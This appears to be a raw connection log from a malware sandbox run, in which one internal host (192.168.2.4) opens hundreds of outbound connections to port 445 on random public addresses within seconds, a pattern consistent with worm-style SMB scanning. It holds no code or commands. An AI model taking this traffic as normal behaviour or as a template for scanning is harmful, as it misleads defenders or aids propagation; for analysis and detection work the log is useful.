Apr 29, 2023 00:54:14.723514080 CEST	52638	445	192.168.2.4	103.243.181.194
Apr 29, 2023 00:54:14.723869085 CEST	52640	445	192.168.2.4	109.63.53.102
Apr 29, 2023 00:54:14.724195004 CEST	52643	445	192.168.2.4	216.211.65.178
Apr 29, 2023 00:54:14.724288940 CEST	52645	445	192.168.2.4	87.136.194.252
Apr 29, 2023 00:54:14.724335909 CEST	52644	445	192.168.2.4	70.232.229.149
Apr 29, 2023 00:54:14.724440098 CEST	52646	445	192.168.2.4	205.202.114.169
Apr 29, 2023 00:54:14.724534988 CEST	52648	445	192.168.2.4	222.88.61.19
Apr 29, 2023 00:54:14.724679947 CEST	52651	445	192.168.2.4	117.182.197.146
Apr 29, 2023 00:54:14.782834053 CEST	52652	445	192.168.2.4	99.142.29.157
Apr 29, 2023 00:54:14.783477068 CEST	52653	445	192.168.2.4	156.184.69.77
Apr 29, 2023 00:54:14.783710957 CEST	52654	445	192.168.2.4	99.235.8.193
Apr 29, 2023 00:54:14.820626020 CEST	52655	445	192.168.2.4	119.100.89.20
Apr 29, 2023 00:54:14.820907116 CEST	52658	445	192.168.2.4	91.10.175.169
Apr 29, 2023 00:54:14.821011066 CEST	52659	445	192.168.2.4	80.2.30.4
Apr 29, 2023 00:54:14.821101904 CEST	52660	445	192.168.2.4	61.219.230.251
Apr 29, 2023 00:54:14.821188927 CEST	52661	445	192.168.2.4	142.103.96.222
Apr 29, 2023 00:54:14.855159998 CEST	445	52643	216.211.65.178	192.168.2.4
Apr 29, 2023 00:54:14.860124111 CEST	52662	445	192.168.2.4	7.161.63.121
Apr 29, 2023 00:54:14.860357046 CEST	52663	445	192.168.2.4	23.108.250.51
Apr 29, 2023 00:54:14.980714083 CEST	52665	445	192.168.2.4	190.85.219.74
Apr 29, 2023 00:54:14.981755972 CEST	52666	445	192.168.2.4	91.244.199.203
Apr 29, 2023 00:54:15.367455959 CEST	52643	445	192.168.2.4	216.211.65.178
Apr 29, 2023 00:54:15.498399019 CEST	445	52643	216.211.65.178	192.168.2.4
Apr 29, 2023 00:54:15.813034058 CEST	52672	445	192.168.2.4	76.222.218.120
Apr 29, 2023 00:54:15.813045979 CEST	52673	445	192.168.2.4	157.140.203.84
Apr 29, 2023 00:54:15.813172102 CEST	52674	445	192.168.2.4	80.73.205.53
Apr 29, 2023 00:54:15.813193083 CEST	52675	445	192.168.2.4	42.10.69.201
Apr 29, 2023 00:54:15.813294888 CEST	52676	445	192.168.2.4	55.149.188.36
Apr 29, 2023 00:54:15.813395023 CEST	52678	445	192.168.2.4	96.209.159.21
Apr 29, 2023 00:54:15.813514948 CEST	52681	445	192.168.2.4	126.169.207.102
Apr 29, 2023 00:54:15.829113007 CEST	52683	445	192.168.2.4	50.235.102.154
Apr 29, 2023 00:54:15.829511881 CEST	52684	445	192.168.2.4	20.113.139.196
Apr 29, 2023 00:54:15.829859018 CEST	52687	445	192.168.2.4	117.13.180.72
Apr 29, 2023 00:54:15.830030918 CEST	52689	445	192.168.2.4	85.158.4.180
Apr 29, 2023 00:54:15.830106974 CEST	52690	445	192.168.2.4	152.227.19.116
Apr 29, 2023 00:54:15.830213070 CEST	52691	445	192.168.2.4	204.91.217.134
Apr 29, 2023 00:54:15.830296993 CEST	52692	445	192.168.2.4	157.22.80.96
Apr 29, 2023 00:54:15.830564976 CEST	52695	445	192.168.2.4	72.76.17.2
Apr 29, 2023 00:54:15.830705881 CEST	52697	445	192.168.2.4	15.144.79.162
Apr 29, 2023 00:54:15.830899954 CEST	52699	445	192.168.2.4	114.92.123.69
Apr 29, 2023 00:54:15.831146955 CEST	52702	445	192.168.2.4	197.115.67.51
Apr 29, 2023 00:54:15.831317902 CEST	52704	445	192.168.2.4	32.184.116.51
Apr 29, 2023 00:54:15.831485987 CEST	52706	445	192.168.2.4	30.62.78.241
Apr 29, 2023 00:54:15.862396955 CEST	445	52689	85.158.4.180	192.168.2.4
Apr 29, 2023 00:54:15.922888994 CEST	445	52702	197.115.67.51	192.168.2.4
Apr 29, 2023 00:54:15.929140091 CEST	52707	445	192.168.2.4	19.124.218.224
Apr 29, 2023 00:54:15.929548979 CEST	52708	445	192.168.2.4	186.224.239.106
Apr 29, 2023 00:54:15.930054903 CEST	52709	445	192.168.2.4	122.39.76.184
Apr 29, 2023 00:54:15.949310064 CEST	52710	445	192.168.2.4	157.46.152.206
Apr 29, 2023 00:54:15.949435949 CEST	52711	445	192.168.2.4	177.240.40.193
Apr 29, 2023 00:54:15.949512959 CEST	52712	445	192.168.2.4	186.95.12.102
Apr 29, 2023 00:54:15.949605942 CEST	52713	445	192.168.2.4	75.50.151.65
Apr 29, 2023 00:54:15.949843884 CEST	52715	445	192.168.2.4	186.111.253.185
Apr 29, 2023 00:54:16.034023046 CEST	52717	445	192.168.2.4	171.58.252.244
Apr 29, 2023 00:54:16.035113096 CEST	52718	445	192.168.2.4	216.103.75.34
Apr 29, 2023 00:54:16.109889030 CEST	52720	445	192.168.2.4	104.94.49.206
Apr 29, 2023 00:54:16.110276937 CEST	52721	445	192.168.2.4	190.32.169.162
Apr 29, 2023 00:54:16.289134979 CEST	445	52721	190.32.169.162	192.168.2.4
Apr 29, 2023 00:54:16.372178078 CEST	52689	445	192.168.2.4	85.158.4.180
Apr 29, 2023 00:54:16.404788017 CEST	445	52689	85.158.4.180	192.168.2.4
Apr 29, 2023 00:54:16.476973057 CEST	52702	445	192.168.2.4	197.115.67.51
Apr 29, 2023 00:54:16.555929899 CEST	445	52702	197.115.67.51	192.168.2.4
Apr 29, 2023 00:54:16.878349066 CEST	52721	445	192.168.2.4	190.32.169.162
Apr 29, 2023 00:54:16.925410032 CEST	52728	445	192.168.2.4	223.99.9.25
Apr 29, 2023 00:54:16.925483942 CEST	52729	445	192.168.2.4	93.43.122.22
Apr 29, 2023 00:54:16.947766066 CEST	52730	445	192.168.2.4	205.198.209.82
Apr 29, 2023 00:54:16.948421955 CEST	52732	445	192.168.2.4	171.163.249.86
Apr 29, 2023 00:54:16.948654890 CEST	52734	445	192.168.2.4	13.100.28.244
Apr 29, 2023 00:54:16.949067116 CEST	52736	445	192.168.2.4	175.43.50.195
Apr 29, 2023 00:54:16.949306965 CEST	52738	445	192.168.2.4	204.245.198.182
Apr 29, 2023 00:54:16.949419022 CEST	52739	445	192.168.2.4	222.216.25.86
Apr 29, 2023 00:54:16.949773073 CEST	52742	445	192.168.2.4	72.164.194.116
Apr 29, 2023 00:54:16.963804960 CEST	52744	445	192.168.2.4	209.140.98.128
Apr 29, 2023 00:54:16.963933945 CEST	52745	445	192.168.2.4	140.65.72.62
Apr 29, 2023 00:54:16.964124918 CEST	52747	445	192.168.2.4	162.33.200.147
Apr 29, 2023 00:54:16.964369059 CEST	52750	445	192.168.2.4	44.234.244.205
Apr 29, 2023 00:54:16.964469910 CEST	52751	445	192.168.2.4	221.182.50.69
Apr 29, 2023 00:54:16.964721918 CEST	52754	445	192.168.2.4	155.199.206.115
Apr 29, 2023 00:54:16.964899063 CEST	52756	445	192.168.2.4	67.69.96.72
Apr 29, 2023 00:54:16.965085030 CEST	52758	445	192.168.2.4	79.54.246.222
Apr 29, 2023 00:54:16.965187073 CEST	52759	445	192.168.2.4	103.37.83.48
Apr 29, 2023 00:54:16.965373039 CEST	52761	445	192.168.2.4	153.251.134.21
Apr 29, 2023 00:54:16.965475082 CEST	52762	445	192.168.2.4	85.24.20.164
Apr 29, 2023 00:54:17.059092045 CEST	445	52721	190.32.169.162	192.168.2.4
Apr 29, 2023 00:54:17.079379082 CEST	52764	445	192.168.2.4	134.222.55.74
Apr 29, 2023 00:54:17.079605103 CEST	52766	445	192.168.2.4	119.147.140.247
Apr 29, 2023 00:54:17.079687119 CEST	52767	445	192.168.2.4	35.80.171.29
Apr 29, 2023 00:54:17.079793930 CEST	52768	445	192.168.2.4	110.227.43.111
Apr 29, 2023 00:54:17.079909086 CEST	52769	445	192.168.2.4	204.164.163.230
Apr 29, 2023 00:54:17.080358028 CEST	52770	445	192.168.2.4	217.112.99.118
Apr 29, 2023 00:54:17.080780029 CEST	52771	445	192.168.2.4	71.220.18.213
Apr 29, 2023 00:54:17.081279993 CEST	52772	445	192.168.2.4	173.51.153.32
Apr 29, 2023 00:54:17.179910898 CEST	52773	445	192.168.2.4	13.57.182.236
Apr 29, 2023 00:54:17.180320024 CEST	52774	445	192.168.2.4	69.142.162.1
Apr 29, 2023 00:54:17.226924896 CEST	52777	445	192.168.2.4	211.41.85.77
Apr 29, 2023 00:54:17.226994991 CEST	52776	445	192.168.2.4	148.236.220.75
Apr 29, 2023 00:54:18.029045105 CEST	52784	445	192.168.2.4	35.41.236.32
Apr 29, 2023 00:54:18.029064894 CEST	52785	445	192.168.2.4	92.103.30.214
Apr 29, 2023 00:54:18.051671028 CEST	52786	445	192.168.2.4	31.94.153.114
Apr 29, 2023 00:54:18.051728010 CEST	52788	445	192.168.2.4	209.136.229.101
Apr 29, 2023 00:54:18.066844940 CEST	52790	445	192.168.2.4	171.231.198.241
Apr 29, 2023 00:54:18.067049980 CEST	52793	445	192.168.2.4	125.228.164.82
Apr 29, 2023 00:54:18.067156076 CEST	52794	445	192.168.2.4	214.124.109.66
Apr 29, 2023 00:54:18.067282915 CEST	52796	445	192.168.2.4	90.33.226.156
Apr 29, 2023 00:54:18.067410946 CEST	52798	445	192.168.2.4	195.208.160.12
Apr 29, 2023 00:54:18.067614079 CEST	52799	445	192.168.2.4	76.184.55.156
Apr 29, 2023 00:54:18.083210945 CEST	52801	445	192.168.2.4	207.221.179.163
Apr 29, 2023 00:54:18.083369970 CEST	52802	445	192.168.2.4	43.57.52.252
Apr 29, 2023 00:54:18.083631992 CEST	52804	445	192.168.2.4	93.1.243.118
Apr 29, 2023 00:54:18.083754063 CEST	52805	445	192.168.2.4	51.149.108.61
Apr 29, 2023 00:54:18.084001064 CEST	52807	445	192.168.2.4	113.225.129.6
Apr 29, 2023 00:54:18.084235907 CEST	52809	445	192.168.2.4	54.113.63.186
Apr 29, 2023 00:54:18.084577084 CEST	52812	445	192.168.2.4	64.62.45.31
Apr 29, 2023 00:54:18.084692001 CEST	52813	445	192.168.2.4	38.19.101.147
Apr 29, 2023 00:54:18.085016012 CEST	52816	445	192.168.2.4	201.97.127.246
Apr 29, 2023 00:54:18.085246086 CEST	52818	445	192.168.2.4	26.200.151.214
Apr 29, 2023 00:54:18.201420069 CEST	52819	445	192.168.2.4	187.194.91.76
Apr 29, 2023 00:54:18.201704025 CEST	52822	445	192.168.2.4	176.195.238.92
Apr 29, 2023 00:54:18.201817989 CEST	52823	445	192.168.2.4	12.193.65.224
Apr 29, 2023 00:54:18.201930046 CEST	52824	445	192.168.2.4	98.160.122.27
Apr 29, 2023 00:54:18.202085018 CEST	52825	445	192.168.2.4	57.133.100.48
Apr 29, 2023 00:54:18.255440950 CEST	52826	445	192.168.2.4	165.149.182.156
Apr 29, 2023 00:54:18.255887032 CEST	52827	445	192.168.2.4	170.81.246.150
Apr 29, 2023 00:54:18.283900023 CEST	52828	445	192.168.2.4	16.5.125.99
Apr 29, 2023 00:54:18.331696987 CEST	52830	445	192.168.2.4	125.25.28.217
Apr 29, 2023 00:54:18.331783056 CEST	52831	445	192.168.2.4	148.203.59.62
Apr 29, 2023 00:54:18.387504101 CEST	52832	445	192.168.2.4	38.137.190.55
Apr 29, 2023 00:54:18.388134003 CEST	52833	445	192.168.2.4	19.116.205.97
Apr 29, 2023 00:54:18.502748966 CEST	445	52830	125.25.28.217	192.168.2.4
Apr 29, 2023 00:54:19.015575886 CEST	52830	445	192.168.2.4	125.25.28.217
Apr 29, 2023 00:54:19.132294893 CEST	52841	445	192.168.2.4	152.253.1.47
Apr 29, 2023 00:54:19.162117004 CEST	52842	445	192.168.2.4	40.179.86.10
Apr 29, 2023 00:54:19.181392908 CEST	52843	445	192.168.2.4	189.13.116.150
Apr 29, 2023 00:54:19.184741020 CEST	52845	445	192.168.2.4	130.175.144.183
Apr 29, 2023 00:54:19.185600996 CEST	445	52830	125.25.28.217	192.168.2.4
Apr 29, 2023 00:54:19.207076073 CEST	52847	445	192.168.2.4	43.153.114.2
Apr 29, 2023 00:54:19.207600117 CEST	52849	445	192.168.2.4	108.172.50.214
Apr 29, 2023 00:54:19.207870960 CEST	52851	445	192.168.2.4	203.250.246.22
Apr 29, 2023 00:54:19.208158970 CEST	52855	445	192.168.2.4	147.204.64.142
Apr 29, 2023 00:54:19.208235025 CEST	52856	445	192.168.2.4	170.134.37.144
Apr 29, 2023 00:54:19.208282948 CEST	52857	445	192.168.2.4	163.67.157.137
Apr 29, 2023 00:54:19.219089985 CEST	52858	445	192.168.2.4	35.88.197.121
Apr 29, 2023 00:54:19.219244957 CEST	52859	445	192.168.2.4	170.112.164.60
Apr 29, 2023 00:54:19.219480038 CEST	52861	445	192.168.2.4	135.111.252.108
Apr 29, 2023 00:54:19.219609022 CEST	52862	445	192.168.2.4	7.208.220.80
Apr 29, 2023 00:54:19.219839096 CEST	52864	445	192.168.2.4	86.131.163.85
Apr 29, 2023 00:54:19.220068932 CEST	52866	445	192.168.2.4	82.100.191.219
Apr 29, 2023 00:54:19.220391035 CEST	52869	445	192.168.2.4	45.168.236.228
Apr 29, 2023 00:54:19.220519066 CEST	52870	445	192.168.2.4	5.9.38.126
Apr 29, 2023 00:54:19.220830917 CEST	52873	445	192.168.2.4	112.166.170.205
Apr 29, 2023 00:54:19.221074104 CEST	52875	445	192.168.2.4	132.46.92.7
Apr 29, 2023 00:54:19.244167089 CEST	445	52870	5.9.38.126	192.168.2.4
Apr 29, 2023 00:54:19.277013063 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:54:19.277046919 CEST	443	49691	23.0.174.122	192.168.2.4
Apr 29, 2023 00:54:19.277260065 CEST	49691	443	192.168.2.4	23.0.174.122
Apr 29, 2023 00:54:19.366643906 CEST	52876	445	192.168.2.4	210.4.141.125
Apr 29, 2023 00:54:19.366966009 CEST	52879	445	192.168.2.4	160.100.44.112
Apr 29, 2023 00:54:19.367060900 CEST	52880	445	192.168.2.4	173.190.6.20
Apr 29, 2023 00:54:19.367150068 CEST	52881	445	192.168.2.4	147.216.148.97
Apr 29, 2023 00:54:19.367247105 CEST	52882	445	192.168.2.4	12.215.147.250
Apr 29, 2023 00:54:19.375318050 CEST	445	52847	43.153.114.2	192.168.2.4
Apr 29, 2023 00:54:19.379616022 CEST	52883	445	192.168.2.4	112.213.130.225
Apr 29, 2023 00:54:19.380002975 CEST	52884	445	192.168.2.4	49.206.44.110
Apr 29, 2023 00:54:19.419569969 CEST	52885	445	192.168.2.4	34.9.239.198
Apr 29, 2023 00:54:19.445743084 CEST	445	52866	82.100.191.219	192.168.2.4
Apr 29, 2023 00:54:19.483120918 CEST	52887	445	192.168.2.4	16.62.125.1
Apr 29, 2023 00:54:19.483536959 CEST	52888	445	192.168.2.4	162.202.72.101
Apr 29, 2023 00:54:19.533487082 CEST	52889	445	192.168.2.4	49.49.235.104
Apr 29, 2023 00:54:19.533507109 CEST	52890	445	192.168.2.4	207.243.238.166
Apr 29, 2023 00:54:19.749131918 CEST	52870	445	192.168.2.4	5.9.38.126
Apr 29, 2023 00:54:19.773317099 CEST	445	52870	5.9.38.126	192.168.2.4
Apr 29, 2023 00:54:19.880734921 CEST	52847	445	192.168.2.4	43.153.114.2
Apr 29, 2023 00:54:19.949574947 CEST	52866	445	192.168.2.4	82.100.191.219
Apr 29, 2023 00:54:20.049001932 CEST	445	52847	43.153.114.2	192.168.2.4
Apr 29, 2023 00:54:20.175443888 CEST	445	52866	82.100.191.219	192.168.2.4
Apr 29, 2023 00:54:20.250869036 CEST	52898	445	192.168.2.4	143.219.174.69
Apr 29, 2023 00:54:20.251166105 CEST	52899	445	192.168.2.4	222.9.176.201
Apr 29, 2023 00:54:20.297703028 CEST	52900	445	192.168.2.4	97.124.204.8
Apr 29, 2023 00:54:20.297904015 CEST	52902	445	192.168.2.4	67.45.84.108
Apr 29, 2023 00:54:20.329416037 CEST	52904	445	192.168.2.4	178.182.79.179
Apr 29, 2023 00:54:20.329967976 CEST	52906	445	192.168.2.4	160.247.176.35
Apr 29, 2023 00:54:20.330996037 CEST	52909	445	192.168.2.4	45.216.227.180
Apr 29, 2023 00:54:20.331352949 CEST	52910	445	192.168.2.4	163.233.136.172
Apr 29, 2023 00:54:20.332218885 CEST	52913	445	192.168.2.4	116.233.25.219
Apr 29, 2023 00:54:20.332761049 CEST	52915	445	192.168.2.4	68.73.29.244
Apr 29, 2023 00:54:20.333054066 CEST	52917	445	192.168.2.4	201.74.154.93
Apr 29, 2023 00:54:20.333167076 CEST	52918	445	192.168.2.4	56.103.2.36
Apr 29, 2023 00:54:20.333458900 CEST	52920	445	192.168.2.4	78.197.169.124
Apr 29, 2023 00:54:20.333517075 CEST	52921	445	192.168.2.4	118.96.218.183
Apr 29, 2023 00:54:20.333659887 CEST	52922	445	192.168.2.4	150.93.134.162
Apr 29, 2023 00:54:20.333930016 CEST	52924	445	192.168.2.4	168.68.97.208
Apr 29, 2023 00:54:20.334078074 CEST	52926	445	192.168.2.4	154.131.240.134
Apr 29, 2023 00:54:20.334568977 CEST	52930	445	192.168.2.4	27.47.47.41
Apr 29, 2023 00:54:20.334625006 CEST	52931	445	192.168.2.4	25.15.51.152
Apr 29, 2023 00:54:20.334784031 CEST	52932	445	192.168.2.4	119.34.18.54
Apr 29, 2023 00:54:20.485985041 CEST	52933	445	192.168.2.4	32.68.176.75
Apr 29, 2023 00:54:20.486547947 CEST	52936	445	192.168.2.4	113.227.166.24
Apr 29, 2023 00:54:20.486767054 CEST	52937	445	192.168.2.4	175.204.78.118
Apr 29, 2023 00:54:20.487013102 CEST	52938	445	192.168.2.4	223.30.137.12
Apr 29, 2023 00:54:20.487272978 CEST	52939	445	192.168.2.4	165.13.32.48
Apr 29, 2023 00:54:20.544214964 CEST	52940	445	192.168.2.4	109.9.116.222
Apr 29, 2023 00:54:20.545021057 CEST	52941	445	192.168.2.4	213.208.141.170
Apr 29, 2023 00:54:20.546400070 CEST	52942	445	192.168.2.4	119.113.245.144
Apr 29, 2023 00:54:20.595120907 CEST	52945	445	192.168.2.4	220.29.155.215
Apr 29, 2023 00:54:20.596178055 CEST	52946	445	192.168.2.4	195.24.169.163
Apr 29, 2023 00:54:20.642796993 CEST	445	52938	223.30.137.12	192.168.2.4
Apr 29, 2023 00:54:20.673634052 CEST	52948	445	192.168.2.4	145.63.200.171
Apr 29, 2023 00:54:20.674202919 CEST	52949	445	192.168.2.4	218.232.25.78
Apr 29, 2023 00:54:21.156868935 CEST	52938	445	192.168.2.4	223.30.137.12
Apr 29, 2023 00:54:21.381691933 CEST	52956	445	192.168.2.4	196.54.63.71
Apr 29, 2023 00:54:21.385699034 CEST	52957	445	192.168.2.4	21.243.159.46
Apr 29, 2023 00:54:21.407284021 CEST	52958	445	192.168.2.4	79.9.246.74
Apr 29, 2023 00:54:21.407685995 CEST	52961	445	192.168.2.4	147.51.74.212
Apr 29, 2023 00:54:21.438926935 CEST	52962	445	192.168.2.4	61.181.179.180
Apr 29, 2023 00:54:21.440403938 CEST	52965	445	192.168.2.4	134.60.20.164
Apr 29, 2023 00:54:21.440536022 CEST	52966	445	192.168.2.4	47.76.254.254
Apr 29, 2023 00:54:21.440741062 CEST	52968	445	192.168.2.4	206.212.1.242
Apr 29, 2023 00:54:21.440848112 CEST	52969	445	192.168.2.4	137.47.92.45
Apr 29, 2023 00:54:21.441302061 CEST	52971	445	192.168.2.4	189.211.15.104
Apr 29, 2023 00:54:21.441653967 CEST	52973	445	192.168.2.4	68.76.116.179
Apr 29, 2023 00:54:21.441782951 CEST	52974	445	192.168.2.4	200.148.41.160
Apr 29, 2023 00:54:21.451421976 CEST	52978	445	192.168.2.4	109.242.57.42
Apr 29, 2023 00:54:21.451535940 CEST	52979	445	192.168.2.4	93.193.34.150
Apr 29, 2023 00:54:21.459949970 CEST	52980	445	192.168.2.4	23.67.8.161
Apr 29, 2023 00:54:21.460217953 CEST	52981	445	192.168.2.4	28.193.101.204
Apr 29, 2023 00:54:21.463886023 CEST	52983	445	192.168.2.4	146.123.183.153
Apr 29, 2023 00:54:21.472208977 CEST	52986	445	192.168.2.4	173.28.63.132
Apr 29, 2023 00:54:21.472383022 CEST	52987	445	192.168.2.4	204.145.168.253
Apr 29, 2023 00:54:21.476167917 CEST	52990	445	192.168.2.4	56.211.245.109
Apr 29, 2023 00:54:21.595171928 CEST	52991	445	192.168.2.4	175.210.96.50
Apr 29, 2023 00:54:21.595655918 CEST	52995	445	192.168.2.4	33.21.53.183
Apr 29, 2023 00:54:21.595860004 CEST	52996	445	192.168.2.4	92.254.225.54
Apr 29, 2023 00:54:21.596024036 CEST	52997	445	192.168.2.4	88.169.6.91
Apr 29, 2023 00:54:21.673703909 CEST	52998	445	192.168.2.4	132.4.24.204
Apr 29, 2023 00:54:21.674438953 CEST	52999	445	192.168.2.4	168.119.46.244
Apr 29, 2023 00:54:21.675139904 CEST	53000	445	192.168.2.4	3.120.93.106
Apr 29, 2023 00:54:21.720256090 CEST	53003	445	192.168.2.4	215.146.3.97
Apr 29, 2023 00:54:21.720390081 CEST	53004	445	192.168.2.4	116.107.186.198
Apr 29, 2023 00:54:21.783049107 CEST	53006	445	192.168.2.4	159.21.202.222
Apr 29, 2023 00:54:21.783227921 CEST	53007	445	192.168.2.4	90.166.128.68
Apr 29, 2023 00:54:22.501161098 CEST	53015	445	192.168.2.4	117.16.98.246
Apr 29, 2023 00:54:22.501168013 CEST	53014	445	192.168.2.4	3.64.17.250
Apr 29, 2023 00:54:22.517272949 CEST	53016	445	192.168.2.4	152.91.94.130
Apr 29, 2023 00:54:22.517776012 CEST	53019	445	192.168.2.4	107.252.184.46
Apr 29, 2023 00:54:22.567574024 CEST	53020	445	192.168.2.4	48.179.156.43
Apr 29, 2023 00:54:22.567765951 CEST	53023	445	192.168.2.4	83.113.54.7
Apr 29, 2023 00:54:22.567936897 CEST	53024	445	192.168.2.4	4.253.244.148
Apr 29, 2023 00:54:22.568131924 CEST	53026	445	192.168.2.4	197.198.40.115
Apr 29, 2023 00:54:22.568285942 CEST	53027	445	192.168.2.4	93.234.152.135
Apr 29, 2023 00:54:22.568490982 CEST	53029	445	192.168.2.4	175.81.171.56
Apr 29, 2023 00:54:22.568918943 CEST	53032	445	192.168.2.4	89.58.130.116
Apr 29, 2023 00:54:22.568919897 CEST	53031	445	192.168.2.4	138.108.93.173
Apr 29, 2023 00:54:22.569751024 CEST	53036	445	192.168.2.4	60.21.47.160
Apr 29, 2023 00:54:22.569933891 CEST	53037	445	192.168.2.4	194.138.66.49
Apr 29, 2023 00:54:22.600024939 CEST	53039	445	192.168.2.4	7.211.170.23
Apr 29, 2023 00:54:22.600207090 CEST	53040	445	192.168.2.4	12.216.0.65
Apr 29, 2023 00:54:22.600684881 CEST	53043	445	192.168.2.4	111.146.186.249
Apr 29, 2023 00:54:22.600910902 CEST	53045	445	192.168.2.4	148.150.76.37
Apr 29, 2023 00:54:22.601047039 CEST	53046	445	192.168.2.4	108.160.106.219
Apr 29, 2023 00:54:22.601259947 CEST	53048	445	192.168.2.4	8.167.105.197
Apr 29, 2023 00:54:22.705558062 CEST	53050	445	192.168.2.4	199.59.157.82
Apr 29, 2023 00:54:22.705650091 CEST	53053	445	192.168.2.4	29.73.165.10
Apr 29, 2023 00:54:22.705856085 CEST	53054	445	192.168.2.4	103.1.183.7
Apr 29, 2023 00:54:22.705986023 CEST	53055	445	192.168.2.4	157.168.223.111
Apr 29, 2023 00:54:22.706175089 CEST	53056	445	192.168.2.4	101.167.14.138
Apr 29, 2023 00:54:22.799228907 CEST	53057	445	192.168.2.4	27.41.168.2
Apr 29, 2023 00:54:22.799784899 CEST	53058	445	192.168.2.4	13.184.232.233
Apr 29, 2023 00:54:22.800734043 CEST	53061	445	192.168.2.4	112.10.91.223
Apr 29, 2023 00:54:22.847111940 CEST	53062	445	192.168.2.4	84.220.188.111
Apr 29, 2023 00:54:22.847573996 CEST	53063	445	192.168.2.4	152.86.13.112
Apr 29, 2023 00:54:22.934029102 CEST	53065	445	192.168.2.4	190.24.141.207
Apr 29, 2023 00:54:22.934082985 CEST	53066	445	192.168.2.4	79.115.22.23
Apr 29, 2023 00:54:23.629235029 CEST	53073	445	192.168.2.4	85.23.49.189
Apr 29, 2023 00:54:23.629394054 CEST	53074	445	192.168.2.4	94.222.109.77
Apr 29, 2023 00:54:23.642673016 CEST	53075	445	192.168.2.4	197.43.202.155
Apr 29, 2023 00:54:23.643376112 CEST	53078	445	192.168.2.4	130.104.83.51
Apr 29, 2023 00:54:23.695066929 CEST	53080	445	192.168.2.4	102.178.171.164
Apr 29, 2023 00:54:23.695662975 CEST	53083	445	192.168.2.4	10.122.136.18
Apr 29, 2023 00:54:23.695991039 CEST	53084	445	192.168.2.4	186.52.8.144
Apr 29, 2023 00:54:23.696789980 CEST	53086	445	192.168.2.4	158.138.197.144
Apr 29, 2023 00:54:23.696990967 CEST	53088	445	192.168.2.4	121.116.185.109
Apr 29, 2023 00:54:23.697027922 CEST	53087	445	192.168.2.4	89.84.112.213
Apr 29, 2023 00:54:23.697325945 CEST	53090	445	192.168.2.4	215.150.87.124
Apr 29, 2023 00:54:23.697432041 CEST	53091	445	192.168.2.4	185.162.232.162
Apr 29, 2023 00:54:23.697778940 CEST	53095	445	192.168.2.4	136.248.105.7
Apr 29, 2023 00:54:23.697808981 CEST	53096	445	192.168.2.4	153.76.225.166
Apr 29, 2023 00:54:23.704225063 CEST	53098	445	192.168.2.4	217.208.233.32
Apr 29, 2023 00:54:23.704642057 CEST	53103	445	192.168.2.4	140.5.97.157
Apr 29, 2023 00:54:23.704679012 CEST	53102	445	192.168.2.4	107.12.138.192
Apr 29, 2023 00:54:23.704833984 CEST	53104	445	192.168.2.4	15.155.2.180
Apr 29, 2023 00:54:23.705127954 CEST	53107	445	192.168.2.4	194.17.9.89
Apr 29, 2023 00:54:23.705244064 CEST	53108	445	192.168.2.4	28.146.157.70
Apr 29, 2023 00:54:23.787372112 CEST	445	53107	194.17.9.89	192.168.2.4
Apr 29, 2023 00:54:23.829638958 CEST	53109	445	192.168.2.4	42.243.200.162
Apr 29, 2023 00:54:23.829653978 CEST	53110	445	192.168.2.4	7.245.194.154
Apr 29, 2023 00:54:23.829771996 CEST	53111	445	192.168.2.4	159.94.24.111
Apr 29, 2023 00:54:23.830007076 CEST	53112	445	192.168.2.4	80.40.139.216
Apr 29, 2023 00:54:23.830571890 CEST	53115	445	192.168.2.4	79.114.25.173
Apr 29, 2023 00:54:23.869411945 CEST	445	53115	79.114.25.173	192.168.2.4
Apr 29, 2023 00:54:23.939331055 CEST	53118	445	192.168.2.4	153.34.208.189
Apr 29, 2023 00:54:23.940179110 CEST	53119	445	192.168.2.4	159.59.64.0
Apr 29, 2023 00:54:23.941092014 CEST	53120	445	192.168.2.4	18.190.40.9
Apr 29, 2023 00:54:23.970400095 CEST	53121	445	192.168.2.4	61.99.89.249
Apr 29, 2023 00:54:23.970921040 CEST	53122	445	192.168.2.4	68.29.100.103
Apr 29, 2023 00:54:24.033090115 CEST	53125	445	192.168.2.4	88.226.126.237
Apr 29, 2023 00:54:24.033145905 CEST	53124	445	192.168.2.4	69.248.137.63
Apr 29, 2023 00:54:24.297827005 CEST	53107	445	192.168.2.4	194.17.9.89
Apr 29, 2023 00:54:24.375951052 CEST	53115	445	192.168.2.4	79.114.25.173
Apr 29, 2023 00:54:24.379539967 CEST	445	53107	194.17.9.89	192.168.2.4
Apr 29, 2023 00:54:24.413662910 CEST	445	53115	79.114.25.173	192.168.2.4
Apr 29, 2023 00:54:24.751287937 CEST	53133	445	192.168.2.4	92.123.16.65
Apr 29, 2023 00:54:24.752037048 CEST	53136	445	192.168.2.4	76.240.24.119
Apr 29, 2023 00:54:24.752403975 CEST	53137	445	192.168.2.4	198.67.107.3
Apr 29, 2023 00:54:24.752782106 CEST	53138	445	192.168.2.4	117.108.114.168
Apr 29, 2023 00:54:24.798043966 CEST	53139	445	192.168.2.4	16.88.117.138
Apr 29, 2023 00:54:24.798243999 CEST	53141	445	192.168.2.4	56.114.69.41
Apr 29, 2023 00:54:24.798635006 CEST	53145	445	192.168.2.4	55.123.217.234
Apr 29, 2023 00:54:24.798722982 CEST	53146	445	192.168.2.4	165.23.139.156
Apr 29, 2023 00:54:24.798958063 CEST	53148	445	192.168.2.4	62.153.108.252
Apr 29, 2023 00:54:24.798986912 CEST	53149	445	192.168.2.4	143.101.14.79
Apr 29, 2023 00:54:24.799228907 CEST	53151	445	192.168.2.4	15.51.139.80
Apr 29, 2023 00:54:24.799361944 CEST	53152	445	192.168.2.4	96.208.2.119
Apr 29, 2023 00:54:24.799696922 CEST	53156	445	192.168.2.4	77.140.61.159
Apr 29, 2023 00:54:24.814152002 CEST	53160	445	192.168.2.4	98.141.148.160
Apr 29, 2023 00:54:24.814356089 CEST	53161	445	192.168.2.4	203.24.179.234
Apr 29, 2023 00:54:24.814603090 CEST	53162	445	192.168.2.4	93.27.106.225
Apr 29, 2023 00:54:24.815310955 CEST	53166	445	192.168.2.4	160.167.159.157
Apr 29, 2023 00:54:24.815493107 CEST	53167	445	192.168.2.4	145.107.69.124
Apr 29, 2023 00:54:24.815679073 CEST	53168	445	192.168.2.4	136.176.200.174
Apr 29, 2023 00:54:24.954641104 CEST	53169	445	192.168.2.4	188.224.64.159
Apr 29, 2023 00:54:24.954823971 CEST	53170	445	192.168.2.4	161.80.217.64
Apr 29, 2023 00:54:24.955063105 CEST	53171	445	192.168.2.4	9.136.116.131
Apr 29, 2023 00:54:24.955374002 CEST	53172	445	192.168.2.4	75.142.66.0
